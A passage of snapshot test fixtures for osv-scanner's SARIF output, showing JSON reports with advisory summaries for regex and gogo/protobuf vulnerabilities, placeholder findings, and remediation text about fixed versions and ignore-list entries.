to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/sub-rust-project/Cargo.lock | regex | 1.5.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-m5pq-gvj9-9vr8 | regex | 1.5.5 |\n| RUSTSEC-2022-0013 | regex | 1.5.5 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/sub-rust-project/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2022-24713\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2022-24713", "name": "CVE-2022-24713", "properties": { "security-severity": "7.5" }, "relationships": [], "shortDescription": { "markdown": "CVE-2022-24713: Regexes with large repetitions on empty sub-expressions take a very long time to parse", "text": "CVE-2022-24713: Regexes with large repetitions on empty sub-expressions take a very long time to parse" } }, { "deprecatedIds": [ "CVE-2021-3121", "GO-2021-0053", "GHSA-c3h9-896r-86jm" ], "fullDescription": { "markdown": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "text": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector." }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2021-3121](https://osv.dev/CVE-2021-3121)**.\n\n## [GO-2021-0053](https://osv.dev/GO-2021-0053)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/go.mod | github.com/gogo/protobuf | 1.3.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GO-2021-0053 | github.com/gogo/protobuf | 1.3.2 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-3121\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2021-3121](https://osv.dev/CVE-2021-3121)**.\n\n## [GO-2021-0053](https://osv.dev/GO-2021-0053)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/go.mod | github.com/gogo/protobuf | 1.3.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GO-2021-0053 | github.com/gogo/protobuf | 1.3.2 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-3121\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2021-3121", "name": "CVE-2021-3121", "relationships": [], "shortDescription": { "markdown": "CVE-2021-3121: Panic due to improper input validation in github.com/gogo/protobuf", "text": "CVE-2021-3121: Panic due to improper input validation in github.com/gogo/protobuf" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/no_sources - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": 